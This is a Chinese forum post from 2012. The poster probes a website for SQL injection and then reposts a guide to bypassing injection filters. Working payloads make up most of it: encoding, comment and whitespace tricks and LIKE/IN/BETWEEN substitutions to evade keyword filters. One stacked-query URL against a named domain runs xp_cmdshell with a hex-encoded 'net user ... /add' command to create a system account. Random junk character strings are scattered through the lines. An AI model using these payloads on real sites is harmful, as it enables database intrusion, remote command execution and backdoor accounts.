路过这个网站,检测了一下. g3 W* R- m6 q
http://www.xxx.cn/Article.asp?ID=117 and 1=1
0 m- W! i8 F. j! a6 I3 [直接返回主页
) p5 a M3 q# n5 shttp://www.xxx.cn/Article.asp?ID=117 or 1=1
$ w( a5 T9 @% l$ h- r: g; j4 v直接返回主页
6 u1 c9 g% E/ j. \7 qhttp://www.xxx.cn/Article.asp?ID=117 or: \& k3 {+ z: v2 Z& ?+ g
没有返回主页 没有过滤or
# |+ ~! r, U* c& ?, `http://www.xxx.cn/Article.asp?ID=117 and$ z0 z4 T+ D* Q2 [& Q# ?7 ~" T
直接返回主页 看来过滤了and4 c: S& ^+ a4 }- C' f
http://www.xxx.cn/Article.asp?ID=117 or 1# i. e3 U- I u& ]) x
没有返回主页 即没有过滤or 也没有过滤1
0 I! ]0 ?9 d# X; f- X& Yhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
, u5 R7 @1 u! e1 v直接返回主页 很明显过滤了等号 " e; `6 X. ~& I! M
or的特性是与and相反的.: I+ ]7 u W' k! G7 ]/ H. h
or 1=1 爆错 或与原页面不同- f( ^% S1 ]# n) A
or 1=2 原页面相同
) U$ p8 T4 g" z5 g; L8 F这样就是一个注入点- g8 V( U3 G8 i5 z
但他过滤了=号 我就用><号代替=号吧!
3 P \/ P1 z+ ^$ ^or 1<2 很明显是正确的,所以应该与原页面不同2 h+ y; r: H' C! V: X" x3 S* W
or 1>2 很明显是错误的,所以应该与原页面相同
6 H5 e: l" B7 [. I- c T然后看看有没有过滤其他的查询语句,比如select.
/ y8 j8 o* C! i, v' zhttp://www.xxx.cn/Article.asp?ID=117 select
$ C% ]6 a7 M) c, N4 X9 b直接返回主页3 x: s7 r6 B2 H$ E9 Y' i# A2 r
又迷茫了..1 c- ~' p6 G# O
- p3 P' q) ~/ O8 @
2 Q* d9 L- I: e0 z* Fcookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗5 a9 o7 c' G% C, d# O( G* V: ~
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)/ O" h' V& ^8 z0 P# D8 ]
================================================
; G1 A; n+ V; P& N以下是转贴:& N, @' j/ N* I% k' u5 e. N
2 ^3 b; p* ?" v9 d突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……
% f4 b }+ s1 @! N经过我的收集,大部分的防注入程序都过滤了以下关键字: ( z$ D/ l8 r$ Z+ _7 `+ v
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
0 T9 E3 U( F3 p b9 n而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。
5 m# S3 p, z! e% Q- t对于关键字的过滤,以下是我收集的以及我个人的一些想法。
2 T; h4 p# A" x9 J7 x5 a9 b* v1、运用编码技术绕过 8 j) W; s( w( |
如URLEncode编码,ASCII编码绕过。例如or 1=1即
# x( [ D. |+ }, v0 O%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 3 F2 `* g2 K. X4 b8 n. S
2 W8 a6 z( C$ F: n2、通过空格绕过
3 t/ l( q$ `8 J如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
6 n$ d' K; i9 _& q4 U# por’ swords’ =‘swords’
, t! F, ^4 D6 X/ c,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。
* ~; L$ n+ D' J2 x! N3 s2 n8 w/ E3、运用字符串判断代替
, e" }; N. ~( B7 G, P- D用经典的or 1=1判断绕过,如 # w* Z! n9 j3 ^9 g: A* T
or ’swords’ =’swords’
3 W* ]0 G' b0 R) u,这个方法就是网上在讨论的。
, D0 }8 P( l9 g8 h5 v' ?2 e5 N9 D4、通过类型转换修饰符N绕过 ; O/ w. O9 I( O$ M: S
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
& i* `* s# Z3 @5、通过+号拆解字符串绕过
% z' l5 n# F: X, O9 V- A" p) t效果值得考证,但毕竟是一种方法。如
1 @; U7 c1 z4 \$ \6 P7 w1 d4 `or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) . a' m3 U4 j( ?) m1 `
% c# j% m2 M/ ?. Z) s' u
6、通过LIKE绕过
; W* e' {$ y6 e7 S2 @5 V% P) \! X5 X以前怎么就没想到呢?如or
5 ^: [( y) @* r/ E, d b1 z8 n’swords’ LIKE ’sw’
- c$ } {& I" C1 R0 j* X$ U5 K!!!显然可以很轻松的绕过 6 i5 D6 Z! j: n1 q f& r8 j
“=”“>” 7 K* Y6 y- X) b. w( |( W
的限制……
# Y+ } ?$ R3 V {' S7、通过IN绕过
; K/ V, Q8 L ?) {: V* j与上面的LIKE的思路差不多,如 7 \ m( \1 I% h5 U* H$ s- p* e' ^
or ’swords’ IN (’swords’)
1 U7 d7 J( C9 L- U& O9 p. d
# i. D/ E6 C3 \& I" b: ? P: r8、通过BETWEEN绕过 ) B, l6 M2 @$ U- T. S% B
如 - z( S* {, S5 K# b& }8 Z
or ’swords’ BETWEEN ’rw’ AND ’tw’ 4 y* X) O8 Z8 f* G7 \) y
! P" \) T( D3 ]8 J- X' D! u
9、通过>或者<绕过 + q1 F' [0 ?. t* v( i
or ’swords’ > ’sw’
2 K& ~0 V% Q2 ~9 \5 y+ qor ’swords’ < ’tw’ " J: a$ z C$ T* B) S8 w! u
or 1<3 ( H! v) d; }+ J V0 G% i
……
+ z, E1 v3 e) T, l5 ?# {# u3 a10、运用注释语句绕过 2 }+ R9 }8 _# [8 ]5 Q3 b
用/**/代替空格,如:
2 H$ I9 d. F. D" U4 M+ sUNION /**/ Select /**/user,pwd,from tbluser
' Y; P- s a5 d J+ b4 v: l4 b
. U$ m+ e/ q* s用/**/分割敏感词,如: ; \9 Q# Z, T( Q9 p$ k0 P( j
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser - `: h- B# k- R% b6 p8 V, M3 R
0 W, e* N0 [ Z! M5 q/ T11、用HEX绕过,一般的IDS都无法检测出来 7 h+ _ p+ N# D: L) p( t: ~, \
0x730079007300610064006D0069006E00 =hex(sysadmin)
, G6 H3 m3 ]# k3 [2 z$ R7 f0x640062005F006F0077006E0065007200 =hex(db_owner) # F! W, H( a6 ^% m- `: t
另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: 2 i1 g& K. A. u9 e( c
declare @a sysname 0 [; L7 n3 ]6 b( Q
select @a= ) ~+ y4 O; ]* }; `7 L. P
exec master.dbo.xp_cmdshell @a ( R, k0 V* A/ o# I
效果
/ @) y3 X( s4 j8 G$ z) w$ Xhttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- % K; W" v$ P- i- w* D( D: e) {4 o; P
2 Y' R2 z: p- i# Y/ Y( W" L
其中的 " U: i3 c& A: J& W6 O' t; P
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 - q* ?3 w8 r; R
就是
8 w- X# w! V; k" _5 w. S ]“net user angel pass /add”
$ p, y: F6 {- v3 I2 F; t4 x. P7 G9 {$ ^* g* L
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。- r u- M2 ~$ y( ]
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。, ?2 p# Z( e1 Z# L8 K* \
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似* s W ~- u- v8 `7 A
Copy code" r" i( G5 a1 |$ N
select * from table exec xp_cmdshell'xxxxxxxxxx'
3 H1 R: w% x& k' v, N2 \, }# `( w* p" m/ s) P' b
5 n8 W7 w* Q3 a8 G
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
- B/ U8 {* t' K
: s r- Z1 A' S) x" ^0 i
9 W8 j$ W# s( c6 Pselect * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'
U/ r3 Z* O, O
& ~! [7 t; u5 n5 S& Y. G: J- v% ?5 M. z* t8 H* w( h- T j
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'
1 C8 F* _6 A. I# L8 ~
5 |% c) z O. x' g的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?1 D; m* o9 x4 U# s: W' s% `* R
& N6 n! [7 k9 \- W8 p) S
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
2 ^5 M7 E% S7 @ Z( k! i可能大家早就知道了,不管怎么说,发在这里吧!
1 \2 N* l0 @- C: `8 h
2 z2 ~4 d8 S6 m" p- {3 }3 `7 A最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
0 B4 l. G4 U3 w! b: Q' V2 s0 B$ V# M4 v+ [
, F; _4 \% S& c' t
1 n! x+ Z! N2 w/ H) o
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试, g% T t' |( g$ h! G/ Z
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧? , ~0 x0 D1 L2 p& s
, f- P6 O8 D' o2 F4 H$ E |
发表于 2012-9-15 14:47:46
收藏
支持
反对